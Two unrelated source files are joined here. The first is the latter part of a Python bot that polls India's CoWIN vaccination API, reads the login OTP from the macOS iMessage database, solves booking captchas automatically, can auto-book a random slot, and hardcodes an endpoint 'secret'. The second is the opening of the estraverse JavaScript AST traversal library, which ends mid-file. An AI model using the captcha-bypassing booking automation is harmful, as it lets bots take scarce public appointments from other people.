        minimum_slots = int(minimum_slots) if int(minimum_slots) >= len(beneficiary_dtls) else len(beneficiary_dtls)
    else:
        minimum_slots = len(beneficiary_dtls)
    # Get refresh frequency
    refresh_freq = input('How often do you want to refresh the calendar (in seconds)? Default 15. Minimum 5. : ')
    refresh_freq = int(refresh_freq) if refresh_freq and int(refresh_freq) >= 5 else 15
    # Get search start date
    start_date = input(
        '\nSearch for next seven day starting from when?\nUse 1 for today, 2 for tomorrow, or provide a date in the format DD-MM-YYYY. Default 2: ')
    if not start_date:
        start_date = 2
    elif start_date in ['1', '2']:
        start_date = int(start_date)
    else:
        try:
            # Validate a custom date; fall back to "tomorrow" on bad input.
            datetime.datetime.strptime(start_date, '%d-%m-%Y')
        except ValueError:
            print('Invalid Date! Proceeding with tomorrow.')
            start_date = 2
    # Get preference of Free/Paid option
    fee_type = get_fee_type_preference()
    print("\n=========== CAUTION! =========== CAUTION! CAUTION! =============== CAUTION! =======\n")
    print("===== BE CAREFUL WITH THIS OPTION! AUTO-BOOKING WILL BOOK THE FIRST AVAILABLE CENTRE, DATE, AND A RANDOM SLOT! =====")
    auto_book = input("Do you want to enable auto-booking? (yes-please or no) Default no: ")
    auto_book = 'no' if not auto_book else auto_book
    collected_details = {
        'beneficiary_dtls': beneficiary_dtls,
        'location_dtls': location_dtls,
        'search_option': search_option,
        'minimum_slots': minimum_slots,
        'refresh_freq': refresh_freq,
        'auto_book': auto_book,
        'start_date': start_date,
        'vaccine_type': vaccine_type,
        'fee_type': fee_type
    }
    return collected_details
def check_calendar_by_district(request_header, vaccine_type, location_dtls, start_date, minimum_slots, min_age_booking, fee_type, dose):
    """
    This function
    1. Takes details required to check vaccination calendar
    2. Filters result by minimum number of slots available
    3. Returns False if token is invalid
    4. Returns list of vaccination centers & slots if available
    """
    try:
        print('===================================================================================')
        today = datetime.datetime.today()

        # Narrow the calendar query to a specific vaccine when one was chosen.
        base_url = CALENDAR_URL_DISTRICT
        if vaccine_type:
            base_url += f"&vaccine={vaccine_type}"

        options = []
        for location in location_dtls:
            resp = requests.get(base_url.format(location['district_id'], start_date), headers=request_header)

            if resp.status_code == 401:
                # Session token has expired; caller must re-authenticate.
                print('TOKEN INVALID')
                return False

            if resp.status_code == 200:
                payload = resp.json()
                if 'centers' in payload:
                    print(f"Centers available in {location['district_name']} from {start_date} as of {today.strftime('%Y-%m-%d %H:%M:%S')}: {len(payload['centers'])}")
                    options.extend(viable_options(payload, minimum_slots, min_age_booking, fee_type, dose))

        # Audible alert (two beeps) for each monitored district that produced
        # at least one viable option; frequency identifies the district.
        districts_with_hits = [option['district'] for option in options]
        for location in location_dtls:
            if location['district_name'] in districts_with_hits:
                for _ in range(2):
                    beep(location['alert_freq'], 150)
        return options

    except Exception as e:
        print(str(e))
        beep(WARNING_BEEP_DURATION[0], WARNING_BEEP_DURATION[1])
def check_calendar_by_pincode(request_header, vaccine_type, location_dtls, start_date, minimum_slots, min_age_booking, fee_type, dose):
    """
    This function
    1. Takes details required to check vaccination calendar
    2. Filters result by minimum number of slots available
    3. Returns False if token is invalid
    4. Returns list of vaccination centers & slots if available
    """
    try:
        print('===================================================================================')
        today = datetime.datetime.today()

        # Narrow the calendar query to a specific vaccine when one was chosen.
        base_url = CALENDAR_URL_PINCODE
        if vaccine_type:
            base_url += f"&vaccine={vaccine_type}"

        options = []
        for location in location_dtls:
            resp = requests.get(base_url.format(location['pincode'], start_date), headers=request_header)

            if resp.status_code == 401:
                # Session token has expired; caller must re-authenticate.
                print('TOKEN INVALID')
                return False

            if resp.status_code == 200:
                payload = resp.json()
                if 'centers' in payload:
                    print(f"Centers available in {location['pincode']} from {start_date} as of {today.strftime('%Y-%m-%d %H:%M:%S')}: {len(payload['centers'])}")
                    options.extend(viable_options(payload, minimum_slots, min_age_booking, fee_type, dose))

        # Audible alert (two beeps) for each monitored pincode that produced
        # at least one viable option. Note: options carry integer pincodes.
        pincodes_with_hits = [option['pincode'] for option in options]
        for location in location_dtls:
            if int(location['pincode']) in pincodes_with_hits:
                for _ in range(2):
                    beep(location['alert_freq'], 150)
        return options

    except Exception as e:
        print(str(e))
        beep(WARNING_BEEP_DURATION[0], WARNING_BEEP_DURATION[1])
def generate_captcha(request_header):
    """Request a fresh captcha challenge and hand it to the captcha builder.

    Returns the solved captcha text, or None when the request fails.
    """
    print('================================= GETTING CAPTCHA ==================================================')
    resp = requests.post(CAPTCHA_URL, headers=request_header)
    print(f'Captcha Response Code: {resp.status_code}')

    if resp.status_code != 200:
        return None
    return captcha_builder(resp.json())
def book_appointment(request_header, details):
    """
    This function
    1. Takes details in json format
    2. Attempts to book an appointment using the details
    3. Returns True or False depending on Token Validity
    """
    try:
        # Keep retrying with a fresh captcha until we either book, hit an
        # auth failure, or get an unexpected response.
        while True:
            details['captcha'] = generate_captcha(request_header)

            print('================================= ATTEMPTING BOOKING ==================================================')
            resp = requests.post(BOOKING_URL, headers=request_header, json=details)
            print(f'Booking Response Code: {resp.status_code}')
            print(f'Booking Response : {resp.text}')

            if resp.status_code == 401:
                # Auth token expired; caller must regenerate it.
                print('TOKEN INVALID')
                return False

            if resp.status_code == 200:
                beep(WARNING_BEEP_DURATION[0], WARNING_BEEP_DURATION[1])
                print('############## BOOKED! ############################ BOOKED! ##############')
                print(" Hey, Hey, Hey! It's your lucky day! ")
                print('\nPress any key thrice to exit program.')
                os.system("pause")
                os.system("pause")
                os.system("pause")
                sys.exit()

            if resp.status_code == 400:
                # Typically "slot no longer available" — try again with a new captcha.
                print(f'Response: {resp.status_code} : {resp.text}')
                continue

            # Any other status: give up on this attempt but keep the token.
            print(f'Response: {resp.status_code} : {resp.text}')
            return True

    except Exception as e:
        print(str(e))
        beep(WARNING_BEEP_DURATION[0], WARNING_BEEP_DURATION[1])
def check_and_book(request_header, beneficiary_dtls, location_dtls, search_option, **kwargs):
    """
    This function
    1. Checks the vaccination calendar for available slots,
    2. Lists all viable options,
    3. Takes user's choice of vaccination center and slot,
    4. Calls function to book appointment, and
    5. Returns True or False depending on Token Validity
    """
    try:
        min_age_booking = get_min_age(beneficiary_dtls)

        minimum_slots = kwargs['min_slots']
        refresh_freq = kwargs['ref_freq']
        auto_book = kwargs['auto_book']
        start_date = kwargs['start_date']
        vaccine_type = kwargs['vaccine_type']
        fee_type = kwargs['fee_type']

        # Dose 2 when the first selected beneficiary is partially vaccinated;
        # all selected beneficiaries are expected to be on the same dose.
        dose = 2 if [beneficiary['status'] for beneficiary in beneficiary_dtls][0] == 'Partially Vaccinated' else 1

        # Resolve the numeric shortcuts into concrete dates (1 = today, 2 = tomorrow);
        # otherwise start_date is already a DD-MM-YYYY string.
        if isinstance(start_date, int) and start_date == 2:
            start_date = (datetime.datetime.today() + datetime.timedelta(days=1)).strftime("%d-%m-%Y")
        elif isinstance(start_date, int) and start_date == 1:
            start_date = datetime.datetime.today().strftime("%d-%m-%Y")
        else:
            pass

        if search_option == 2:
            options = check_calendar_by_district(request_header, vaccine_type, location_dtls, start_date,
                                                 minimum_slots, min_age_booking, fee_type, dose)
        else:
            options = check_calendar_by_pincode(request_header, vaccine_type, location_dtls, start_date,
                                                minimum_slots, min_age_booking, fee_type, dose)

        if isinstance(options, bool):
            # Calendar check reported an invalid token.
            return False

        if options is None:
            # BUG FIX: the calendar check returns None when it hits an internal
            # exception (e.g. network error); previously this crashed on
            # sorted(None). Treat it as "no options yet" and keep polling.
            return True

        options = sorted(options,
                         key=lambda k: (k['district'].lower(), k['pincode'],
                                        k['name'].lower(),
                                        datetime.datetime.strptime(k['date'], "%d-%m-%Y"))
                         )

        tmp_options = copy.deepcopy(options)
        if len(tmp_options) > 0:
            # Strip internal IDs before showing the table to the user.
            cleaned_options_for_display = []
            for item in tmp_options:
                item.pop('session_id', None)
                item.pop('center_id', None)
                cleaned_options_for_display.append(item)

            display_table(cleaned_options_for_display)
            if auto_book == 'yes-please':
                print("AUTO-BOOKING IS ENABLED. PROCEEDING WITH FIRST CENTRE, DATE, and RANDOM SLOT.")
                option = options[0]
                random_slot = random.randint(1, len(option['slots']))
                choice = f'1.{random_slot}'
            else:
                choice = inputimeout(
                    prompt='----------> Wait 20 seconds for updated options OR \n----------> Enter a choice e.g: 1.4 for (1st center 4th slot): ',
                    timeout=20)
        else:
            # Countdown until the next calendar refresh.
            for i in range(refresh_freq, 0, -1):
                msg = f"No viable options. Next update in {i} seconds.."
                print(msg, end="\r", flush=True)
                sys.stdout.flush()
                time.sleep(1)
            choice = '.'

    except TimeoutOccurred:
        # User did not pick an option in time; poll again.
        time.sleep(1)
        return True

    else:
        if choice == '.':
            return True
        else:
            try:
                choice = choice.split('.')
                choice = [int(item) for item in choice]
                print(f'============> Got Choice: Center #{choice[0]}, Slot #{choice[1]}')

                new_req = {
                    'beneficiaries': [beneficiary['bref_id'] for beneficiary in beneficiary_dtls],
                    # Reuse the dose computed above instead of re-deriving it.
                    'dose': dose,
                    'center_id' : options[choice[0] - 1]['center_id'],
                    'session_id': options[choice[0] - 1]['session_id'],
                    'slot'      : options[choice[0] - 1]['slots'][choice[1] - 1]
                }
                print(f'Booking with info: {new_req}')
                return book_appointment(request_header, new_req)

            except IndexError:
                print("============> Invalid Option!")
                os.system("pause")
                pass
def get_vaccine_preference():
    """Ask the user for a first-dose vaccine preference.

    Returns the vaccine name expected by the API, or None for no preference
    (including blank or out-of-range input).
    """
    print("It seems you're trying to find a slot for your first dose. Do you have a vaccine preference?")
    preference = input("Enter 0 for No Preference, 1 for COVISHIELD, 2 for COVAXIN, or 3 for SPUTNIK V. Default 0 : ")
    preference = int(preference) if preference and int(preference) in [0, 1, 2, 3] else 0

    # 0 is absent from the map, so .get() yields None (= no preference).
    vaccine_by_choice = {1: 'COVISHIELD', 2: 'COVAXIN', 3: 'SPUTNIK V'}
    return vaccine_by_choice.get(preference)
def get_fee_type_preference():
    """Ask the user for a fee-type filter.

    Returns the list of acceptable fee types; blank/invalid input means both.
    """
    print("\nDo you have a fee type preference?")
    preference = input("Enter 0 for No Preference, 1 for Free Only, or 2 for Paid Only. Default 0 : ")
    preference = int(preference) if preference and int(preference) in [0, 1, 2] else 0

    if preference == 1:
        return ['Free']
    if preference == 2:
        return ['Paid']
    return ['Free', 'Paid']
def get_pincodes():
    """Prompt for comma-separated pincodes to monitor.

    Each entry gets its own beep frequency so alerts are distinguishable.
    """
    pincodes = input("Enter comma separated pincodes to monitor: ")
    return [
        {
            'pincode': pincode,
            'alert_freq': 440 + ((2 * idx) * 110)
        }
        for idx, pincode in enumerate(pincodes.split(','))
    ]
def get_districts(request_header):
    """
    This function
    1. Lists all states, prompts to select one,
    2. Lists all districts in that state, prompts to select required ones, and
    3. Returns the list of districts as list(dict)
    """
    states = requests.get('https://cdn-api.co-vin.in/api/v2/admin/location/states', headers=request_header)

    if states.status_code == 200:
        states = states.json()['states']

        refined_states = []
        for state in states:
            tmp = {'state': state['state_name']}
            refined_states.append(tmp)

        display_table(refined_states)
        # User enters a 1-based index into the table just displayed.
        state = int(input('\nEnter State index: '))
        state_id = states[state - 1]['state_id']

        districts = requests.get(f'https://cdn-api.co-vin.in/api/v2/admin/location/districts/{state_id}', headers=request_header)

        if districts.status_code == 200:
            districts = districts.json()['districts']

            refined_districts = []
            for district in districts:
                tmp = {'district': district['district_name']}
                refined_districts.append(tmp)

            display_table(refined_districts)
            # Multiple districts may be monitored; indices are 1-based.
            reqd_districts = input('\nEnter comma separated index numbers of districts to monitor : ')
            districts_idx = [int(idx) - 1 for idx in reqd_districts.split(',')]
            # Each selected district gets its own beep frequency so audible
            # alerts identify which district has availability.
            reqd_districts = [{
                'district_id': item['district_id'],
                'district_name': item['district_name'],
                'alert_freq': 440 + ((2 * idx) * 110)
            } for idx, item in enumerate(districts) if idx in districts_idx]

            print(f'Selected districts: ')
            display_table(reqd_districts)
            return reqd_districts

        else:
            # District fetch failed: report and abort the program.
            print('Unable to fetch districts')
            print(districts.status_code)
            print(districts.text)
            os.system("pause")
            sys.exit(1)

    else:
        # State fetch failed: report and abort the program.
        print('Unable to fetch states')
        print(states.status_code)
        print(states.text)
        os.system("pause")
        sys.exit(1)
def get_beneficiaries(request_header):
    """
    This function
    1. Fetches all beneficiaries registered under the mobile number,
    2. Prompts user to select the applicable beneficiaries, and
    3. Returns the list of beneficiaries as list(dict)
    """
    beneficiaries = requests.get(BENEFICIARIES_URL, headers=request_header)

    if beneficiaries.status_code == 200:
        beneficiaries = beneficiaries.json()['beneficiaries']

        refined_beneficiaries = []
        for beneficiary in beneficiaries:
            # Approximate age from birth year (API does not return full DOB).
            beneficiary['age'] = datetime.datetime.today().year - int(beneficiary['birth_year'])

            tmp = {
                'bref_id': beneficiary['beneficiary_reference_id'],
                'name': beneficiary['name'],
                'vaccine': beneficiary['vaccine'],
                'age': beneficiary['age'],
                'status': beneficiary['vaccination_status']
            }
            refined_beneficiaries.append(tmp)

        display_table(refined_beneficiaries)
        print("""
################# IMPORTANT NOTES #################
# 1. While selecting beneficiaries, make sure that selected beneficiaries are all taking the same dose: either first OR second.
# Please do no try to club together booking for first dose for one beneficiary and second dose for another beneficiary.
#
# 2. While selecting beneficiaries, also make sure that beneficiaries selected for second dose are all taking the same vaccine: COVISHIELD OR COVAXIN.
# Please do no try to club together booking for beneficiary taking COVISHIELD with beneficiary taking COVAXIN.
#
# 3. If you're selecting multiple beneficiaries, make sure all are of the same age group (45+ or 18+) as defined by the govt.
# Please do not try to club together booking for younger and older beneficiaries.
###################################################
""")
        # User enters 1-based indices into the table just displayed.
        reqd_beneficiaries = input('Enter comma separated index numbers of beneficiaries to book for : ')
        beneficiary_idx = [int(idx) - 1 for idx in reqd_beneficiaries.split(',')]
        reqd_beneficiaries = [{
            'bref_id': item['beneficiary_reference_id'],
            'name': item['name'],
            'vaccine': item['vaccine'],
            'age': item['age'],
            'status': item['vaccination_status']
        } for idx, item in enumerate(beneficiaries) if idx in beneficiary_idx]

        print(f'Selected beneficiaries: ')
        display_table(reqd_beneficiaries)
        return reqd_beneficiaries

    else:
        # Fetch failed: report and return an empty selection.
        print('Unable to fetch beneficiaries')
        print(beneficiaries.status_code)
        print(beneficiaries.text)
        os.system("pause")
        return []
def get_min_age(beneficiary_dtls):
    """
    This function returns a min age argument, based on age of all beneficiaries
    :param beneficiary_dtls:
    :return: min_age:int
    """
    return min(item['age'] for item in beneficiary_dtls)
def generate_token_OTP(mobile, request_header, unattended = False):
    """
    This function generate OTP and returns a new token

    :param mobile: registered mobile number the OTP is sent to
    :param request_header: headers to send with every request
    :param unattended: when True, read the OTP from macOS iMessage instead of
        prompting the user interactively
    :return: the auth token string; loops with retry prompts until obtained
    """
    if not mobile:
        print("Mobile number cannot be empty")
        os.system('pause')
        sys.exit()

    valid_token = False
    while not valid_token:
        try:
            # Fixed "secret" value required by the public OTP endpoint.
            data = {"mobile": mobile,
                    "secret": "U2FsdGVkX1+z/4Nr9nta+2DrVJSv7KS6VoQUSQ1ZXYDx/CJUkWxFYG6P3iM/VW+6jLQ9RDQVzp/RcZ8kbT41xw=="
                    }
            txnId = requests.post(url=OTP_PRO_URL, json=data, headers=request_header)

            if txnId.status_code == 200:
                print(f"Successfully requested OTP for mobile number {mobile} at {datetime.datetime.today()}..")
                txnId = txnId.json()['txnId']

                if unattended:
                    OTP = readOTPfromMacOS()
                else:
                    OTP = input("Enter OTP (If this takes more than 2 minutes, press Enter to retry): ")
                if OTP:
                    # The API expects the SHA-256 hex digest of the OTP, not the raw digits.
                    data = {"otp": sha256(str(OTP).encode('utf-8')).hexdigest(), "txnId": txnId}
                    print(f"Validating OTP..")

                    token = requests.post(url='https://cdn-api.co-vin.in/api/v2/auth/validateMobileOtp', json=data,
                                          headers=request_header)
                    if token.status_code == 200:
                        token = token.json()['token']
                        print(f'Token Generated: {token}')
                        valid_token = True
                        return token

                    else:
                        # Validation failed (wrong/expired OTP): offer a retry.
                        print('Unable to Validate OTP')
                        print(f"Response: {token.text}")

                        retry = input(f"Retry with {mobile} ? (y/n Default y): ")
                        retry = retry if retry else 'y'
                        if retry == 'y':
                            pass
                        else:
                            sys.exit()

            else:
                # OTP request itself failed: offer a retry.
                print('Unable to Generate OTP')
                print(txnId.status_code, txnId.text)

                retry = input(f"Retry with {mobile} ? (y/n Default y): ")
                retry = retry if retry else 'y'
                if retry == 'y':
                    pass
                else:
                    sys.exit()

        except Exception as e:
            # Network hiccups etc.: log and loop to retry the whole flow.
            print(str(e))
def readOTPfromMacOS():
    """
    This function reads OTP from iMessage in macOS.

    Waits a few seconds for the SMS to land, then reads the most recent
    message from the local iMessage database and extracts the 6-digit code.

    :return: the OTP string, or None if no CoWIN message with a code is found
    """
    # Give the OTP SMS a few seconds to arrive before reading the database.
    wait_for_otp = 10
    for i in range(wait_for_otp, 0, -1):
        msg = f"Waiting for OTP. Reading OTP in {i} seconds.."
        print(msg, end="\r", flush=True)
        sys.stdout.flush()
        time.sleep(1)

    home = str(Path.home())
    conn = sqlite3.connect(home + "/Library/Messages/chat.db")
    try:
        # Only the newest message/handle rows matter for a just-received OTP.
        messages = pd.read_sql_query("select * from message order by ROWID desc limit 1", conn)
        handles = pd.read_sql_query("select * from handle order by ROWID desc limit 1", conn)
    finally:
        # BUG FIX: the connection was previously never closed.
        conn.close()

    messages.rename(columns={'ROWID': 'message_id'}, inplace=True)
    handles.rename(columns={'id': 'phone_number', 'ROWID': 'handle_id'}, inplace=True)

    imessage_df = pd.merge(messages[['text', 'handle_id', 'date', 'is_sent', 'message_id']],
                           handles[['handle_id', 'phone_number']], on='handle_id', how='left')

    for index, row in imessage_df.iterrows():
        verification_code_text = row['text']
        # Guard against non-text rows (attachments have text == None) which
        # previously raised TypeError on the `in` check.
        if not verification_code_text or "CoWIN" not in verification_code_text:
            continue
        # Raw string avoids the invalid escape sequence warning for \d; guard
        # against a CoWIN message without a 6-digit code (previous IndexError).
        match = re.findall(r'(\d{6})', verification_code_text)
        if match:
            return match[0]
    return None
|
/*
Copyright (C) 2012-2013 Yusuke Suzuki <[email protected]>
Copyright (C) 2012 Ariya Hidayat <[email protected]>
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*jslint vars:false, bitwise:true*/
/*jshint indent:4*/
/*global exports:true*/
(function clone(exports) {
    'use strict';

    // Module-level state shared by the traversal machinery below.
    var Syntax,
        isArray,
        VisitorOption,
        VisitorKeys,
        objectCreate,
        objectKeys,
        BREAK,
        SKIP,
        REMOVE;

    // No-op used solely to mark intentionally-unused values for JSHint.
    function ignoreJSHintError() { }

    // Array.isArray with a pre-ES5 fallback.
    isArray = Array.isArray;
    if (!isArray) {
        isArray = function isArray(array) {
            return Object.prototype.toString.call(array) === '[object Array]';
        };
    }
// Recursively clone a plain-object tree of own enumerable properties.
// Note: array values are cloned as plain objects with numeric keys (the
// recursion always builds {}), which callers here tolerate.
function deepCopy(obj) {
    var clone = {};
    Object.keys(obj).forEach(function (name) {
        var value = obj[name];
        if (value !== null && typeof value === 'object') {
            clone[name] = deepCopy(value);
        } else {
            clone[name] = value;
        }
    });
    return clone;
}
// Copy the own enumerable properties of `obj`, one level deep.
function shallowCopy(obj) {
    var copy = {};
    Object.keys(obj).forEach(function (name) {
        copy[name] = obj[name];
    });
    return copy;
}
ignoreJSHintError(shallowCopy);
// based on LLVM libc++ upper_bound / lower_bound
// MIT License

// Binary search: smallest index whose element makes `func` truthy, assuming
// `func` is falsy on a prefix of the array and truthy on the rest.
function upperBound(array, func) {
    var low = 0, span = array.length, half, probe;
    while (span > 0) {
        half = span >>> 1;
        probe = low + half;
        if (func(array[probe])) {
            span = half;
        } else {
            low = probe + 1;
            span -= half + 1;
        }
    }
    return low;
}
// Binary search: smallest index whose element makes `func` falsy, assuming
// `func` is truthy on a prefix of the array and falsy on the rest.
function lowerBound(array, func) {
    var low = 0, span = array.length, half, probe;
    while (span > 0) {
        half = span >>> 1;
        probe = low + half;
        if (func(array[probe])) {
            low = probe + 1;
            span -= half + 1;
        } else {
            span = half;
        }
    }
    return low;
}
ignoreJSHintError(lowerBound);
objectCreate = Object.create || (function () {
function F() { }
return function (o) {
F.prototype = o;
return new F();
};
})();
objectKeys = Object.keys || function (o) {
var keys = [], key;
for (key in o) {
keys.push(key);
}
return keys;
};
// Copy every enumerable key of `from` onto `to`; returns `to`.
function extend(to, from) {
    var names = objectKeys(from), idx, total;
    for (idx = 0, total = names.length; idx < total; idx += 1) {
        to[names[idx]] = from[names[idx]];
    }
    return to;
}
Syntax = {
AssignmentExpression: 'AssignmentExpression',
AssignmentPattern: 'AssignmentPattern',
ArrayExpression: 'ArrayExpression',
ArrayPattern: 'ArrayPattern',
ArrowFunctionExpression: 'ArrowFunctionExpression',
AwaitExpression: 'AwaitExpression', // CAUTION: It's deferred to ES7.
BlockStatement: 'BlockStatement',
BinaryExpression: 'BinaryExpression',
BreakStatement: 'BreakStatement',
CallExpression: 'CallExpression',
CatchClause: 'CatchClause',
ClassBody: 'ClassBody',
ClassDeclaration: 'ClassDeclaration',
ClassExpression: 'ClassExpression',
ComprehensionBlock: 'ComprehensionBlock', // CAUTION: It's deferred to ES7.
ComprehensionExpression: 'ComprehensionExpression', // CAUTION: It's deferred to ES7.
ConditionalExpression: 'ConditionalExpression',
ContinueStatement: 'ContinueStatement',
DebuggerStatement: 'DebuggerStatement',
DirectiveStatement: 'DirectiveStatement',
DoWhileStatement: 'DoWhileStatement',
EmptyStatement: 'EmptyStatement',
ExportAllDeclaration: 'ExportAllDeclaration',
ExportDefaultDeclaration: 'ExportDefaultDeclaration',
ExportNamedDeclaration: 'ExportNamedDeclaration',
ExportSpecifier: 'ExportSpecifier',
ExpressionStatement: 'ExpressionStatement',
ForStatement: 'ForStatement',
ForInStatement: 'ForInStatement',
ForOfStatement: 'ForOfStatement',
FunctionDeclaration: 'FunctionDeclaration',
FunctionExpression: 'FunctionExpression',
GeneratorExpression: 'GeneratorExpression', // CAUTION: It's deferred to ES7.
Identifier: 'Identifier',
IfStatement: 'IfStatement',
ImportDeclaration: 'ImportDeclaration',
ImportDefaultSpecifier: 'ImportDefaultSpecifier',
ImportNamespaceSpecifier: 'ImportNamespaceSpecifier',
ImportSpecifier: 'ImportSpecifier',
Literal: 'Literal',
LabeledStatement: 'LabeledStatement',
LogicalExpression: 'LogicalExpression',
MemberExpression: 'MemberExpression',
MetaProperty: 'MetaProperty',
MethodDefinition: 'MethodDefinition',
ModuleSpecifier: 'ModuleSpecifier',
NewExpression: 'NewExpression',
ObjectExpression: 'ObjectExpression',
ObjectPattern: 'ObjectPattern',
Program: 'Program',
Property: 'Property',
RestElement: 'RestElement',
ReturnStatement: 'ReturnStatement',
SequenceExpression: 'SequenceExpression',
SpreadElement: 'SpreadElement',
Super: 'Super',
SwitchStatement: 'SwitchStatement',
SwitchCase: 'SwitchCase',
TaggedTemplateExpression: 'TaggedTemplateExpression',
TemplateElement: 'TemplateElement',
TemplateLiteral: 'TemplateLiteral',
ThisExpression: 'ThisExpression',
ThrowStatement: 'ThrowStatement',
TryStatement: 'TryStatement',
UnaryExpression: 'UnaryExpression',
UpdateExpression: 'UpdateExpression',
VariableDeclaration: 'VariableDeclaration',
VariableDeclarator: 'VariableDeclarator',
WhileStatement: 'WhileStatement',
WithStatement: 'WithStatement',
YieldExpression: 'YieldExpression'
};
VisitorKeys = {
AssignmentExpression: ['left', 'right'],
AssignmentPattern: ['left', 'right'],
ArrayExpression: ['elements'],
ArrayPattern: ['elements'],
ArrowFunctionExpression: ['params', 'body'],
AwaitExpression: ['argument'], // CAUTION: It's deferred to ES7.
BlockStatement: ['body'],
BinaryExpression: ['left', 'right'],
BreakStatement: ['label'],
CallExpression: ['callee', 'arguments'],
CatchClause: ['param', 'body'],
ClassBody: ['body'],
ClassDeclaration: ['id', 'superClass', 'body'],
ClassExpression: ['id', 'superClass', 'body'],
ComprehensionBlock: ['left', 'right'], // CAUTION: It's deferred to ES7.
ComprehensionExpression: ['blocks', 'filter', 'body'], // CAUTION: It's deferred to ES7.
ConditionalExpression: ['test', 'consequent', 'alternate'],
ContinueStatement: ['label'],
DebuggerStatement: [],
DirectiveStatement: [],
DoWhileStatement: ['body', 'test'],
EmptyStatement: [],
ExportAllDeclaration: ['source'],
ExportDefaultDeclaration: ['declaration'],
ExportNamedDeclaration: ['declaration', 'specifiers', 'source'],
ExportSpecifier: ['exported', 'local'],
ExpressionStatement: ['expression'],
ForStatement: ['init', 'test', 'update', 'body'],
ForInStatement: ['left', 'right', 'body'],
ForOfStatement: ['left', 'right', 'body'],
FunctionDeclaration: ['id', 'params', 'body'],
FunctionExpression: ['id', 'params', 'body'],
GeneratorExpression: ['blocks', 'filter', 'body'], // CAUTION: It's deferred to ES7.
Identifier: [],
IfStatement: ['test', 'consequent', 'alternate'],
ImportDeclaration: ['specifiers', 'source'],
ImportDefaultSpecifier: ['local'],
ImportNamespaceSpecifier: ['local'],
ImportSpecifier: ['imported', 'local'],
Literal: [],
LabeledStatement: ['label', 'body'],
LogicalExpression: ['left', 'right'],
MemberExpression: ['object', 'property'],
MetaProperty: ['meta', 'property'],
MethodDefinition: ['key', 'value'],
ModuleSpecifier: [],
NewExpression: ['callee', 'arguments'],
ObjectExpression: ['properties'],
ObjectPattern: ['properties'],
Program: ['body'],
Property: ['key', 'value'],
RestElement: [ 'argument' ],
ReturnStatement: ['argument'],
SequenceExpression: ['expressions'],
SpreadElement: ['argument'],
Super: [],
SwitchStatement: ['discriminant', 'cases'],
SwitchCase: ['test', 'consequent'],
TaggedTemplateExpression: ['tag', 'quasi'],
TemplateElement: [],
TemplateLiteral: ['quasis', 'expressions'],
ThisExpression: [],
ThrowStatement: ['argument'],
TryStatement: ['block', 'handler', 'finalizer'],
UnaryExpression: ['argument'],
UpdateExpression: ['argument'],
VariableDeclaration: ['declarations'],
VariableDeclarator: ['id', 'init'],
WhileStatement: ['test', 'body'],
WithStatement: ['object', 'body'],
YieldExpression: ['argument']
};
// unique id
BREAK = {};
SKIP = {};
REMOVE = {};
VisitorOption = {
Break: BREAK,
Skip: SKIP,
Remove: REMOVE
};
// A writable pointer to `parent[key]`, used to splice replacement nodes in.
function Reference(parent, key) {
    this.parent = parent;
    this.key = key;
}

// Overwrite the referenced slot with `node`.
Reference.prototype.replace = function replace(node) {
    this.parent[this.key] = node;
};

// Remove the referenced slot. Returns true when the parent is an array and
// the element was spliced out (shifting later indices down); otherwise the
// slot is merely set to null and false is returned.
Reference.prototype.remove = function remove() {
    if (!isArray(this.parent)) {
        this.replace(null);
        return false;
    }
    this.parent.splice(this.key, 1);
    return true;
};
// One traversal work item: the node plus where it lives (path), how it is
// wrapped (e.g. 'Property'), and the Reference used for write-back.
function Element(node, path, wrap, ref) {
    this.node = node;
    this.path = path;
    this.wrap = wrap;
    this.ref = ref;
}
function Controller() { }

// API:
// return property path array from root to current node
Controller.prototype.path = function path() {
    var idx, total, result;

    // Append `path` (a scalar key or a [key, index] pair) onto `result`.
    function flattenInto(result, path) {
        var j, jz;
        if (isArray(path)) {
            for (j = 0, jz = path.length; j < jz; ++j) {
                result.push(path[j]);
            }
        } else {
            result.push(path);
        }
    }

    // The root element carries no path.
    if (!this.__current.path) {
        return null;
    }

    // leavelist[0] is the sentinel and leavelist[1] the root element; both
    // are skipped.
    result = [];
    for (idx = 2, total = this.__leavelist.length; idx < total; ++idx) {
        flattenInto(result, this.__leavelist[idx].path);
    }
    flattenInto(result, this.__current.path);
    return result;
};

// API:
// return type of current node
Controller.prototype.type = function () {
    return this.current().type || this.__current.wrap;
};

// API:
// return array of parent elements
Controller.prototype.parents = function parents() {
    var idx, total, nodes = [];

    // Skip the sentinel element at index 0.
    for (idx = 1, total = this.__leavelist.length; idx < total; ++idx) {
        nodes.push(this.__leavelist[idx].node);
    }
    return nodes;
};

// API:
// return current node
Controller.prototype.current = function current() {
    return this.__current.node;
};
// Run an enter/leave callback with `element` temporarily installed as the
// current element; the previous current element is restored afterwards.
Controller.prototype.__execute = function __execute(callback, element) {
    var saved = this.__current;
    var outcome;

    this.__current = element;
    this.__state = null;
    if (callback) {
        // Second argument is the parent node (last entry on leavelist).
        outcome = callback.call(this, element.node, this.__leavelist[this.__leavelist.length - 1].node);
    }
    this.__current = saved;

    return outcome;
};

// API:
// notify control skip / break
Controller.prototype.notify = function notify(flag) {
    this.__state = flag;
};

// API:
// skip child nodes of current node
Controller.prototype.skip = function () {
    this.notify(SKIP);
};

// API:
// break traversals
Controller.prototype['break'] = function () {
    this.notify(BREAK);
};

// API:
// remove node
